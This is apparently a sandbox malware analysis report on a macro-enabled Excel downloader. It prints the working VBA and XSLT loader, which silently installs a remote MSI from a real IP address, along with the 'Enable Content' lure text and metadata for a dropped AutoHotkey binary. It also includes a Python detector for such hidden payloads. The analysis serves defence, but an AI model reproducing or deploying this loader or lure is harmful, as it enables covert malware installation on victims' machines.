Malicious
Classifications

Downloader

Threat Names

-

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "23 hours, 12 minutes" to "40 seconds" to reveal dormant functionality.

File Name Category Type Verdict
C:\Users\kEecfMwgj\Desktop\Mobile_App_Project_Details.xls Sample File Office File
Malicious
MIME Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 70.16 KB
MD5 01160f0692b8c141b421202c4f82e875
SHA1 11f4bd8e2057249b7b214d05026ef830b2c24542
SHA256 205a543c733eea51309dea6fa850f87bcaeefa1835bd0955ea43923820e2834e
SSDeep 1536:iytDWOI4Deap+fjSCqP533pQp6mPw0MlKOhqVqr/36vYa:/tHeCCShP536pdPOlFqVY/1a
ImpHash -
Office Information
Creator User
Last Modified By support
Create Time 2015-06-05 18:17 (UTC)
Modify Time 2024-10-03 12:35 (UTC)
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Worksheets 1
Titles Of Parts Sheet 1
ScaleCrop False
SharedDoc False
VBA Macros (1)
Macro #1: Module1
Deobfuscated Code
Attribute VB_Name = "Module1"

' Auto_Open runs as soon as the workbook is opened with macros enabled,
' which is exactly what the lure image (see Extracted Image Texts) asks the user to do.
Sub Auto_Open()
    LoadAndProcessXML
End Sub

Sub LoadAndProcessXML()
    ' Only proceeds if the sheet carries at least one shape: the original
    ' code reads the stylesheet from that shape's text frame.
    If ActiveSheet.Shapes.Count > 0 Then
        ' The version-independent ProgID MSXML2.DOMDocument resolves to MSXML 3,
        ' which still permits script blocks inside XSLT (MSXML 6 disables them by default).
        Dim xmlDoc As New MSXML2.DOMDocument
        ' XSL stylesheet carrying an <ms:script> block in JScript. When the transform runs,
        ' the script creates the WindowsInstaller.Installer COM object, sets UILevel = 2
        ' (msiUILevelNone: no installer UI) and calls InstallProduct on a remote MSI.
        If xmlDoc.loadXML("<?xml version='1.0'?> <stylesheet xmlns=""http://www.w3.org/1999/XSL/Transform"" xmlns:ms=""urn:schemas-microsoft-com:xslt"" xmlns:user=""placeholder"" version=""1.0""> <ms:script implements-prefix=""user"" language=""JScript""> <![CDATA[ var r = new ActiveXObject(""WindowsInstaller.Installer""); r.UILevel = 2; r.InstallProduct(""http://162.250.124.142/files/ 435842fec424a8586e5855128884b319 ""); ]]> </ms:script> </stylesheet>") Then
            Dim transformedDoc As New MSXML2.DOMDocument
            ' Transforming the stylesheet with itself is enough to execute the embedded script.
            xmlDoc.transformNodeToObject xmlDoc.CloneNode(True), transformedDoc
        End If
    End If
End Sub


Original Code
Attribute VB_Name = "Module1"
Sub Auto_Open()
    Call LoadAndProcessXML
End Sub

Sub LoadAndProcessXML()
    If ActiveSheet.Shapes.Count > 0 Then
        ' The stylesheet is not stored in the VBA project: it is the text of the
        ' first drawing shape and is read back at run time, so a macro-only
        ' extraction shows a generic XML loader with no URL or ProgID in it.
        Dim xmlContent As String
        xmlContent = ActiveSheet.Shapes(1).TextFrame.Characters.Text

        Dim xmlDoc As New MSXML2.DOMDocument
        If xmlDoc.loadXML(xmlContent) Then
            Dim transformedDoc As New MSXML2.DOMDocument
            ' The script inside the stylesheet executes here, during the transform.
            xmlDoc.transformNodeToObject xmlDoc.CloneNode(True), transformedDoc
        End If
    End If
End Sub
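Added example (not part of the VMRay report and not VMRay's code): because the original macro pulls the stylesheet out of ActiveSheet.Shapes(1).TextFrame, the JScript never appears in vbaProject.bin, and a macro-only extraction shows nothing but a bland XML loader. The script below opens an .xlsm as the zip container it is, reassembles each shape's text runs from xl/drawings/*.xml, and flags an XSL stylesheet whose ms:script block instantiates a ProgID such as WindowsInstaller.Installer. The workbook it scans is constructed in memory with a placeholder URL (payload.invalid) instead of the real one; the list of suspicious ProgIDs and the verdict logic are assumptions of this example.

```python
"""Find XSLT script payloads hidden in Excel shape text frames (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional
from xml.sax.saxutils import escape

XDR_NS = "http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing"
A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"

RE_SCRIPT = re.compile(r"<(?:[\w-]+:)?script\b[^>]*\blanguage\s*=\s*[\"']?(\w+)", re.I)
RE_XSL_NS = re.compile(r"http://www\.w3\.org/1999/XSL/Transform", re.I)
RE_PROGID = re.compile(r"ActiveXObject\s*\(\s*[\"']([\w.]+)[\"']\s*\)", re.I)
RE_URL = re.compile(r"https?://[^\s\"'<>)]+", re.I)
# Assumption of this example: ProgIDs that fetch or execute when created from a document.
SUSPICIOUS_PROGIDS = {"windowsinstaller.installer", "wscript.shell", "shell.application",
                      "msxml2.xmlhttp", "msxml2.serverxmlhttp", "adodb.stream"}
NAMESPACE_URLS = {"http://www.w3.org/1999/XSL/Transform"}  # namespace URIs, not fetch targets


@dataclass
class ShapeFinding:
    part: str
    shape_index: int
    text: str
    script_language: Optional[str] = None
    xsl_namespace: bool = False
    progids: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return (self.script_language is not None and self.xsl_namespace
                and any(p.lower() in SUSPICIOUS_PROGIDS for p in self.progids))


def shape_texts(drawing_xml: bytes):
    """Yield one string per <xdr:sp>: runs (<a:t>) joined within a paragraph,
    paragraphs joined with newlines. Joining runs matters: Excel may split a long
    string into several runs, and a per-run grep then misses the identifiers."""
    root = ET.fromstring(drawing_xml)
    for sp in root.iter("{%s}sp" % XDR_NS):
        paras = ["".join(t.text or "" for t in p.iter("{%s}t" % A_NS))
                 for p in sp.iter("{%s}p" % A_NS)]
        yield "\n".join(paras)


def scan_workbook(data: bytes) -> List[ShapeFinding]:
    """Walk every drawing part of an OOXML workbook and extract script indicators."""
    findings: List[ShapeFinding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in sorted(zf.namelist()):
            if not (name.startswith("xl/drawings/") and name.endswith(".xml")):
                continue
            for idx, text in enumerate(shape_texts(zf.read(name)), start=1):
                f = ShapeFinding(part=name, shape_index=idx, text=text)
                m = RE_SCRIPT.search(text)
                f.script_language = m.group(1) if m else None
                f.xsl_namespace = bool(RE_XSL_NS.search(text))
                f.progids = RE_PROGID.findall(text)
                f.urls = [u for u in RE_URL.findall(text) if u not in NAMESPACE_URLS]
                findings.append(f)
    return findings


def triage(data: bytes) -> dict:
    """Shape text is inert on its own; it needs code to feed it to MSXML, so the
    VBA project plus a script-bearing shape together carry the malicious verdict."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        has_vba = "xl/vbaProject.bin" in zf.namelist()
    bad = [f for f in scan_workbook(data) if f.suspicious]
    verdict = "malicious" if (has_vba and bad) else ("suspicious" if bad else "clean")
    return {"has_vba": has_vba, "verdict": verdict,
            "indicators": [(f.part, f.shape_index, f.progids, f.urls) for f in bad]}


# Constructed sample input (not the real document): the stylesheet from the report
# with a placeholder URL, stored in a shape's text frame split across two runs.
CONSTRUCTED_STYLESHEET = (
    "<?xml version='1.0'?> "
    '<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" '
    'xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> '
    '<ms:script implements-prefix="user" language="JScript"> <![CDATA[ '
    'var r = new ActiveXObject("WindowsInstaller.Installer"); r.UILevel = 2; '
    'r.InstallProduct("http://payload.invalid/files/stage2.msi"); ]]> </ms:script> </stylesheet>'
)


def build_sample_xlsm() -> bytes:
    """Minimal .xlsm-like container: one drawing with two shapes plus an empty vbaProject.bin."""
    cut = CONSTRUCTED_STYLESHEET.index("ActiveXObject") + 7  # split inside "ActiveXObject"
    runs = "".join("<a:r><a:t>%s</a:t></a:r>" % escape(s)
                   for s in (CONSTRUCTED_STYLESHEET[:cut], CONSTRUCTED_STYLESHEET[cut:]))
    drawing = (
        '<xdr:wsDr xmlns:xdr="{xdr}" xmlns:a="{a}"><xdr:twoCellAnchor>'
        "<xdr:sp><xdr:txBody><a:p>{runs}</a:p></xdr:txBody></xdr:sp>"
        "<xdr:sp><xdr:txBody><a:p><a:r><a:t>Quarterly figures</a:t></a:r></a:p></xdr:txBody></xdr:sp>"
        "</xdr:twoCellAnchor></xdr:wsDr>"
    ).format(xdr=XDR_NS, a=A_NS, runs=runs)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/vbaProject.bin", b"")
        zf.writestr("xl/drawings/drawing1.xml", drawing)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage(build_sample_xlsm()))
```

Run it against a real workbook by passing the file's bytes to triage(); for .xls (OLE2) samples the drawing is stored in the BIFF stream instead, so this zip-based walk applies only to the OOXML container the MIME type here reports.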
Extracted Image Texts (1)
Image #1: image1.png
Microsoft Excel You are trying to open a file created in a previous version of Microsoft Office Follow these steps: Open the document in «Microsoft Excel» and check for yellow bar at the top and click on «Enable Editing» then click on «Enable Content»
Extracted URLs (3)
WHOIS data: Not Available. Reputation: Not Queried.
C:\Persistent\DSAWcfProxy.exe Dropped File Binary
Suspicious
Lowered to Suspicious because the artifact is known to be Clean or Trusted.
MIME Type application/vnd.microsoft.portable-executable
File Size 893.00 KB
MD5 b6af97aa32c636c3c4e87bb768a3ceb7
SHA1 83054af67df43ae70c7f8ac6e8a499d9c9dd82ec
SHA256 ba35b8b4346b79b8bb4f97360025cb6befaf501b03149a3b5fef8f07bdf265c7
SSDeep 24576:Kbi/QhDC8mY93kyw8hC2A5CxLbRpWrzzZyP4UMdg:1/QMnl5YL7WzZyQRd
ImpHash c07a5e2247b48b561b9ee6a9e632f518
File Reputation Information
Verdict
Clean
Known to be clean.
PE Information
Image Base 0x00400000
Entry Point 0x0049D3B0
Size Of Code 0x000AC200
Size Of Initialized Data 0x00038E00
File Type IMAGE_FILE_EXECUTABLE_IMAGE
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2024-03-16 06:02 (UTC)
Version Information (8)
FileDescription AutoHotkey Unicode 32-bit
FileVersion 1.1.37.02
InternalName AutoHotkey
LegalCopyright Copyright (C) 2003-2013
CompanyName AutoHotkey Foundation LLC
OriginalFilename AutoHotkey.exe
ProductName AutoHotkey
ProductVersion 1.1.37.02
Sections (4)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x00401000 0x000AC011 0x000AC200 0x00000400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.64
.rdata 0x004AE000 0x00026188 0x00026200 0x000AC600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.84
.data 0x004D5000 0x00009204 0x00003400 0x000D2800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.16
.rsrc 0x004DF000 0x000096C0 0x00009800 0x000D5C00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.65
Imports (14)
WSOCK32.dll (22)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
WSACleanup 0x00000074 0x004AE708 0x000D21C8 0x000D07C8 -
recv 0x00000010 0x004AE70C 0x000D21CC 0x000D07CC -
socket 0x00000017 0x004AE710 0x000D21D0 0x000D07D0 -
getservbyname 0x00000037 0x004AE714 0x000D21D4 0x000D07D4 -
WSASetLastError 0x00000070 0x004AE718 0x000D21D8 0x000D07D8 -
WSAAsyncSelect 0x00000065 0x004AE71C 0x000D21DC 0x000D07DC -
closesocket 0x00000003 0x004AE720 0x000D21E0 0x000D07E0 -
gethostbyaddr 0x00000033 0x004AE724 0x000D21E4 0x000D07E4 -
gethostbyname 0x00000034 0x004AE728 0x000D21E8 0x000D07E8 -
send 0x00000013 0x004AE72C 0x000D21EC 0x000D07EC -
getservbyport 0x00000038 0x004AE730 0x000D21F0 0x000D07F0 -
gethostname 0x00000039 0x004AE734 0x000D21F4 0x000D07F4 -
inet_ntoa 0x0000000C 0x004AE738 0x000D21F8 0x000D07F8 -
connect 0x00000004 0x004AE73C 0x000D21FC 0x000D07FC -
inet_addr 0x0000000B 0x004AE740 0x000D2200 0x000D0800 -
WSAStartup 0x00000073 0x004AE744 0x000D2204 0x000D0804 -
ioctlsocket 0x0000000A 0x004AE748 0x000D2208 0x000D0808 -
htonl 0x00000008 0x004AE74C 0x000D220C 0x000D080C -
WSAGetLastError 0x0000006F 0x004AE750 0x000D2210 0x000D0810 -
htons 0x00000009 0x004AE754 0x000D2214 0x000D0814 -
ntohs 0x0000000F 0x004AE758 0x000D2218 0x000D0818 -
shutdown 0x00000016 0x004AE75C 0x000D221C 0x000D081C -
WINMM.dll (12)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
waveOutGetVolume - 0x004AE6D4 0x000D2194 0x000D0794 0x000000B2
mixerGetLineInfoW - 0x004AE6D8 0x000D2198 0x000D0798 0x0000006A
mixerSetControlDetails - 0x004AE6DC 0x000D219C 0x000D079C 0x0000006E
mixerGetControlDetailsW - 0x004AE6E0 0x000D21A0 0x000D07A0 0x00000063
mixerGetLineControlsW - 0x004AE6E4 0x000D21A4 0x000D07A4 0x00000068
mixerGetDevCapsW - 0x004AE6E8 0x000D21A8 0x000D07A8 0x00000065
waveOutSetVolume - 0x004AE6EC 0x000D21AC 0x000D07AC 0x000000BB
mixerClose - 0x004AE6F0 0x000D21B0 0x000D07B0 0x00000061
mixerOpen - 0x004AE6F4 0x000D21B4 0x000D07B4 0x0000006D
mciSendStringW - 0x004AE6F8 0x000D21B8 0x000D07B8 0x00000032
joyGetDevCapsW - 0x004AE6FC 0x000D21BC 0x000D07BC 0x00000018
joyGetPosEx - 0x004AE700 0x000D21C0 0x000D07C0 0x0000001B
VERSION.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFileVersionInfoW - 0x004AE6AC 0x000D216C 0x000D076C 0x00000006
VerQueryValueW - 0x004AE6B0 0x000D2170 0x000D0770 0x0000000E
GetFileVersionInfoSizeW - 0x004AE6B4 0x000D2174 0x000D0774 0x00000005
COMCTL32.dll (7)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ImageList_GetIconSize - 0x004AE050 0x000D1B10 0x000D0110 0x00000063
ImageList_Create - 0x004AE054 0x000D1B14 0x000D0114 0x00000053
ImageList_Destroy - 0x004AE058 0x000D1B18 0x000D0118 0x00000054
ImageList_AddMasked - 0x004AE05C 0x000D1B1C 0x000D011C 0x0000004F
ImageList_ReplaceIcon - 0x004AE060 0x000D1B20 0x000D0120 0x0000006F
CreateStatusWindowW - 0x004AE064 0x000D1B24 0x000D0124 0x0000000C
InitCommonControlsEx - 0x004AE068 0x000D1B28 0x000D0128 0x0000007B
PSAPI.DLL (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetModuleBaseNameW - 0x004AE3BC 0x000D1E7C 0x000D047C 0x0000000E
GetModuleFileNameExW - 0x004AE3C0 0x000D1E80 0x000D0480 0x00000010
WININET.dll (5)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
InternetReadFile - 0x004AE6BC 0x000D217C 0x000D077C 0x0000009F
InternetOpenUrlW - 0x004AE6C0 0x000D2180 0x000D0780 0x00000099
InternetCloseHandle - 0x004AE6C4 0x000D2184 0x000D0784 0x0000006B
InternetReadFileExA - 0x004AE6C8 0x000D2188 0x000D0788 0x000000A0
InternetOpenW - 0x004AE6CC 0x000D218C 0x000D078C 0x0000009A
KERNEL32.dll (150)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GlobalUnlock - 0x004AE10C 0x000D1BCC 0x000D01CC 0x000002C5
GetEnvironmentVariableW - 0x004AE110 0x000D1BD0 0x000D01D0 0x000001DC
FreeLibrary - 0x004AE114 0x000D1BD4 0x000D01D4 0x00000162
WideCharToMultiByte - 0x004AE118 0x000D1BD8 0x000D01D8 0x00000511
GetSystemDirectoryA - 0x004AE11C 0x000D1BDC 0x000D01DC 0x0000026F
GetProcAddress - 0x004AE120 0x000D1BE0 0x000D01E0 0x00000245
LoadLibraryA - 0x004AE124 0x000D1BE4 0x000D01E4 0x0000033C
GetCurrentThreadId - 0x004AE128 0x000D1BE8 0x000D01E8 0x000001C5
lstrcmpiW - 0x004AE12C 0x000D1BEC 0x000D01EC 0x00000545
GetStringTypeExW - 0x004AE130 0x000D1BF0 0x000D01F0 0x00000268
CreateThread - 0x004AE134 0x000D1BF4 0x000D01F4 0x000000B5
SetThreadPriority - 0x004AE138 0x000D1BF8 0x000D01F8 0x00000499
GetExitCodeThread - 0x004AE13C 0x000D1BFC 0x000D01FC 0x000001E0
CloseHandle - 0x004AE140 0x000D1C00 0x000D0200 0x00000052
CreateMutexW - 0x004AE144 0x000D1C04 0x000D0204 0x0000009E
GetLastError - 0x004AE148 0x000D1C08 0x000D0208 0x00000202
LoadLibraryW - 0x004AE14C 0x000D1C0C 0x000D020C 0x0000033F
GetModuleHandleW - 0x004AE150 0x000D1C10 0x000D0210 0x00000218
GetVersionExW - 0x004AE154 0x000D1C14 0x000D0214 0x000002A4
InitializeCriticalSection - 0x004AE158 0x000D1C18 0x000D0218 0x000002E2
DeleteCriticalSection - 0x004AE15C 0x000D1C1C 0x000D021C 0x000000D1
GetModuleFileNameW - 0x004AE160 0x000D1C20 0x000D0220 0x00000214
GetFileAttributesW - 0x004AE164 0x000D1C24 0x000D0224 0x000001EA
GetFullPathNameW - 0x004AE168 0x000D1C28 0x000D0228 0x000001FB
GetSystemTimeAsFileTime - 0x004AE16C 0x000D1C2C 0x000D022C 0x00000279
LoadResource - 0x004AE170 0x000D1C30 0x000D0230 0x00000341
LockResource - 0x004AE174 0x000D1C34 0x000D0234 0x00000354
SizeofResource - 0x004AE178 0x000D1C38 0x000D0238 0x000004B1
GetShortPathNameW - 0x004AE17C 0x000D1C3C 0x000D023C 0x00000261
FindFirstFileW - 0x004AE180 0x000D1C40 0x000D0240 0x00000139
FindNextFileW - 0x004AE184 0x000D1C44 0x000D0244 0x00000145
FindClose - 0x004AE188 0x000D1C48 0x000D0248 0x0000012E
FileTimeToLocalFileTime - 0x004AE18C 0x000D1C4C 0x000D024C 0x00000124
SetEnvironmentVariableW - 0x004AE190 0x000D1C50 0x000D0250 0x00000457
Beep - 0x004AE194 0x000D1C54 0x000D0254 0x00000036
MoveFileW - 0x004AE198 0x000D1C58 0x000D0258 0x00000363
OutputDebugStringW - 0x004AE19C 0x000D1C5C 0x000D025C 0x0000038A
CreateProcessW - 0x004AE1A0 0x000D1C60 0x000D0260 0x000000A8
MultiByteToWideChar - 0x004AE1A4 0x000D1C64 0x000D0264 0x00000367
GetExitCodeProcess - 0x004AE1A8 0x000D1C68 0x000D0268 0x000001DF
WriteProcessMemory - 0x004AE1AC 0x000D1C6C 0x000D026C 0x0000052E
ReadProcessMemory - 0x004AE1B0 0x000D1C70 0x000D0270 0x000003C3
GetCurrentProcessId - 0x004AE1B4 0x000D1C74 0x000D0274 0x000001C1
OpenProcess - 0x004AE1B8 0x000D1C78 0x000D0278 0x00000380
TerminateProcess - 0x004AE1BC 0x000D1C7C 0x000D027C 0x000004C0
SetPriorityClass - 0x004AE1C0 0x000D1C80 0x000D0280 0x0000047D
GlobalFree - 0x004AE1C4 0x000D1C84 0x000D0284 0x000002BA
GetLocalTime - 0x004AE1C8 0x000D1C88 0x000D0288 0x00000203
GetDateFormatW - 0x004AE1CC 0x000D1C8C 0x000D028C 0x000001C8
GetTimeFormatW - 0x004AE1D0 0x000D1C90 0x000D0290 0x00000297
GetDiskFreeSpaceExW - 0x004AE1D4 0x000D1C94 0x000D0294 0x000001CE
SetVolumeLabelW - 0x004AE1D8 0x000D1C98 0x000D0298 0x000004A9
CreateFileW - 0x004AE1DC 0x000D1C9C 0x000D029C 0x0000008F
DeviceIoControl - 0x004AE1E0 0x000D1CA0 0x000D02A0 0x000000DD
GetDriveTypeW - 0x004AE1E4 0x000D1CA4 0x000D02A4 0x000001D3
GetVolumeInformationW - 0x004AE1E8 0x000D1CA8 0x000D02A8 0x000002A7
GetDiskFreeSpaceW - 0x004AE1EC 0x000D1CAC 0x000D02AC 0x000001CF
GetCurrentDirectoryW - 0x004AE1F0 0x000D1CB0 0x000D02B0 0x000001BF
CreateDirectoryW - 0x004AE1F4 0x000D1CB4 0x000D02B4 0x00000081
ReadFile - 0x004AE1F8 0x000D1CB8 0x000D02B8 0x000003C0
WriteFile - 0x004AE1FC 0x000D1CBC 0x000D02BC 0x00000525
DeleteFileW - 0x004AE200 0x000D1CC0 0x000D02C0 0x000000D6
CopyFileW - 0x004AE204 0x000D1CC4 0x000D02C4 0x00000075
SetFileAttributesW - 0x004AE208 0x000D1CC8 0x000D02C8 0x00000461
LocalFileTimeToFileTime - 0x004AE20C 0x000D1CCC 0x000D02CC 0x00000346
SetFileTime - 0x004AE210 0x000D1CD0 0x000D02D0 0x0000046A
GetFileSizeEx - 0x004AE214 0x000D1CD4 0x000D02D4 0x000001F1
GetSystemTime - 0x004AE218 0x000D1CD8 0x000D02D8 0x00000277
GetSystemDefaultUILanguage - 0x004AE21C 0x000D1CDC 0x000D02DC 0x0000026E
GetComputerNameW - 0x004AE220 0x000D1CE0 0x000D02E0 0x0000018F
GetSystemWindowsDirectoryW - 0x004AE224 0x000D1CE4 0x000D02E4 0x0000027C
GetTempPathW - 0x004AE228 0x000D1CE8 0x000D02E8 0x00000285
EnterCriticalSection - 0x004AE22C 0x000D1CEC 0x000D02EC 0x000000EE
LeaveCriticalSection - 0x004AE230 0x000D1CF0 0x000D02F0 0x00000339
VirtualProtect - 0x004AE234 0x000D1CF4 0x000D02F4 0x000004EF
QueryDosDeviceW - 0x004AE238 0x000D1CF8 0x000D02F8 0x000003A0
CompareStringW - 0x004AE23C 0x000D1CFC 0x000D02FC 0x00000064
RemoveDirectoryW - 0x004AE240 0x000D1D00 0x000D0300 0x00000403
GetCurrentProcess - 0x004AE244 0x000D1D04 0x000D0304 0x000001C0
CreateToolhelp32Snapshot - 0x004AE248 0x000D1D08 0x000D0308 0x000000BE
Process32FirstW - 0x004AE24C 0x000D1D0C 0x000D030C 0x00000396
Process32NextW - 0x004AE250 0x000D1D10 0x000D0310 0x00000398
FormatMessageW - 0x004AE254 0x000D1D14 0x000D0314 0x0000015E
GetPrivateProfileStringW - 0x004AE258 0x000D1D18 0x000D0318 0x00000242
GetPrivateProfileSectionW - 0x004AE25C 0x000D1D1C 0x000D031C 0x00000240
GetPrivateProfileSectionNamesW - 0x004AE260 0x000D1D20 0x000D0320 0x0000023F
WritePrivateProfileStringW - 0x004AE264 0x000D1D24 0x000D0324 0x0000052B
WritePrivateProfileSectionW - 0x004AE268 0x000D1D28 0x000D0328 0x00000529
SetEndOfFile - 0x004AE26C 0x000D1D2C 0x000D032C 0x00000453
GetACP - 0x004AE270 0x000D1D30 0x000D0330 0x00000168
GetFileType - 0x004AE274 0x000D1D34 0x000D0334 0x000001F3
GetStdHandle - 0x004AE278 0x000D1D38 0x000D0338 0x00000264
SetFilePointerEx - 0x004AE27C 0x000D1D3C 0x000D033C 0x00000467
SystemTimeToFileTime - 0x004AE280 0x000D1D40 0x000D0340 0x000004BD
FileTimeToSystemTime - 0x004AE284 0x000D1D44 0x000D0344 0x00000125
GetFileSize - 0x004AE288 0x000D1D48 0x000D0348 0x000001F0
VirtualAllocEx - 0x004AE28C 0x000D1D4C 0x000D034C 0x000004EA
VirtualFreeEx - 0x004AE290 0x000D1D50 0x000D0350 0x000004ED
EnumResourceNamesW - 0x004AE294 0x000D1D54 0x000D0354 0x00000102
LoadLibraryExW - 0x004AE298 0x000D1D58 0x000D0358 0x0000033E
GlobalSize - 0x004AE29C 0x000D1D5C 0x000D035C 0x000002C2
GlobalAlloc - 0x004AE2A0 0x000D1D60 0x000D0360 0x000002B3
GlobalLock - 0x004AE2A4 0x000D1D64 0x000D0364 0x000002BE
FindResourceW - 0x004AE2A8 0x000D1D68 0x000D0368 0x0000014E
SetErrorMode - 0x004AE2AC 0x000D1D6C 0x000D036C 0x00000458
GetCPInfo - 0x004AE2B0 0x000D1D70 0x000D0370 0x00000172
SetCurrentDirectoryW - 0x004AE2B4 0x000D1D74 0x000D0374 0x0000044D
Sleep - 0x004AE2B8 0x000D1D78 0x000D0378 0x000004B2
GetTickCount - 0x004AE2BC 0x000D1D7C 0x000D037C 0x00000293
MulDiv - 0x004AE2C0 0x000D1D80 0x000D0380 0x00000366
ExitProcess - 0x004AE2C4 0x000D1D84 0x000D0384 0x00000119
HeapSize - 0x004AE2C8 0x000D1D88 0x000D0388 0x000002D4
HeapQueryInformation - 0x004AE2CC 0x000D1D8C 0x000D038C 0x000002D1
GetCommandLineW - 0x004AE2D0 0x000D1D90 0x000D0390 0x00000187
HeapSetInformation - 0x004AE2D4 0x000D1D94 0x000D0394 0x000002D3
GetStartupInfoW - 0x004AE2D8 0x000D1D98 0x000D0398 0x00000263
InterlockedIncrement - 0x004AE2DC 0x000D1D9C 0x000D039C 0x000002EF
InterlockedDecrement - 0x004AE2E0 0x000D1DA0 0x000D03A0 0x000002EB
HeapAlloc - 0x004AE2E4 0x000D1DA4 0x000D03A4 0x000002CB
HeapFree - 0x004AE2E8 0x000D1DA8 0x000D03A8 0x000002CF
HeapReAlloc - 0x004AE2EC 0x000D1DAC 0x000D03AC 0x000002D2
GetOEMCP - 0x004AE2F0 0x000D1DB0 0x000D03B0 0x00000237
IsValidCodePage - 0x004AE2F4 0x000D1DB4 0x000D03B4 0x0000030A
TlsAlloc - 0x004AE2F8 0x000D1DB8 0x000D03B8 0x000004C5
TlsGetValue - 0x004AE2FC 0x000D1DBC 0x000D03BC 0x000004C7
TlsSetValue - 0x004AE300 0x000D1DC0 0x000D03C0 0x000004C8
TlsFree - 0x004AE304 0x000D1DC4 0x000D03C4 0x000004C6
UnhandledExceptionFilter - 0x004AE308 0x000D1DC8 0x000D03C8 0x000004D3
SetUnhandledExceptionFilter - 0x004AE30C 0x000D1DCC 0x000D03CC 0x000004A5
IsDebuggerPresent - 0x004AE310 0x000D1DD0 0x000D03D0 0x00000300
GetStringTypeW - 0x004AE314 0x000D1DD4 0x000D03D4 0x00000269
HeapCreate - 0x004AE318 0x000D1DD8 0x000D03D8 0x000002CD
InitializeCriticalSectionAndSpinCount - 0x004AE31C 0x000D1DDC 0x000D03DC 0x000002E3
RaiseException - 0x004AE320 0x000D1DE0 0x000D03E0 0x000003B1
IsProcessorFeaturePresent - 0x004AE324 0x000D1DE4 0x000D03E4 0x00000304
LCMapStringW - 0x004AE328 0x000D1DE8 0x000D03E8 0x0000032D
RtlUnwind - 0x004AE32C 0x000D1DEC 0x000D03EC 0x00000418
GetConsoleCP - 0x004AE330 0x000D1DF0 0x000D03F0 0x0000019A
GetConsoleMode - 0x004AE334 0x000D1DF4 0x000D03F4 0x000001AC
FreeEnvironmentStringsW - 0x004AE338 0x000D1DF8 0x000D03F8 0x00000161
GetEnvironmentStringsW - 0x004AE33C 0x000D1DFC 0x000D03FC 0x000001DA
SetHandleCount - 0x004AE340 0x000D1E00 0x000D0400 0x0000046F
QueryPerformanceCounter - 0x004AE344 0x000D1E04 0x000D0404 0x000003A7
SetFilePointer - 0x004AE348 0x000D1E08 0x000D0408 0x00000466
WriteConsoleW - 0x004AE34C 0x000D1E0C 0x000D040C 0x00000524
SetStdHandle - 0x004AE350 0x000D1E10 0x000D0410 0x00000487
FlushFileBuffers - 0x004AE354 0x000D1E14 0x000D0414 0x00000157
GetProcessHeap - 0x004AE358 0x000D1E18 0x000D0418 0x0000024A
SetLastError - 0x004AE35C 0x000D1E1C 0x000D041C 0x00000473
VirtualQuery - 0x004AE360 0x000D1E20 0x000D0420 0x000004F1
USER32.dll (170)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetFocus - 0x004AE400 0x000D1EC0 0x000D04C0 0x00000292
SetWindowRgn - 0x004AE404 0x000D1EC4 0x000D04C4 0x000002C7
SetWindowPos - 0x004AE408 0x000D1EC8 0x000D04C8 0x000002C6
SetLayeredWindowAttributes - 0x004AE40C 0x000D1ECC 0x000D04CC 0x00000298
InvalidateRect - 0x004AE410 0x000D1ED0 0x000D04D0 0x000001BE
EnableWindow - 0x004AE414 0x000D1ED4 0x000D04D4 0x000000D8
GetWindowTextLengthW - 0x004AE418 0x000D1ED8 0x000D04D8 0x000001A2
EnumWindows - 0x004AE41C 0x000D1EDC 0x000D04DC 0x000000F2
IsZoomed - 0x004AE420 0x000D1EE0 0x000D04E0 0x000001E2
IsIconic - 0x004AE424 0x000D1EE4 0x000D04E4 0x000001D1
EnumDisplayMonitors - 0x004AE428 0x000D1EE8 0x000D04E8 0x000000E6
RegisterWindowMessageW - 0x004AE42C 0x000D1EEC 0x000D04EC 0x00000263
GetSysColor - 0x004AE430 0x000D1EF0 0x000D04F0 0x0000017B
GetSysColorBrush - 0x004AE434 0x000D1EF4 0x000D04F4 0x0000017C
DrawIconEx - 0x004AE438 0x000D1EF8 0x000D04F8 0x000000C8
FillRect - 0x004AE43C 0x000D1EFC 0x000D04FC 0x000000F6
DefWindowProcW - 0x004AE440 0x000D1F00 0x000D0500 0x0000009C
SetForegroundWindow - 0x004AE444 0x000D1F04 0x000D0504 0x00000293
DialogBoxParamW - 0x004AE448 0x000D1F08 0x000D0508 0x000000AC
SendDlgItemMessageW - 0x004AE44C 0x000D1F0C 0x000D050C 0x00000273
GetDlgItem - 0x004AE450 0x000D1F10 0x000D0510 0x00000127
SetDlgItemTextW - 0x004AE454 0x000D1F14 0x000D0514 0x00000290
MessageBeep - 0x004AE458 0x000D1F18 0x000D0518 0x0000020D
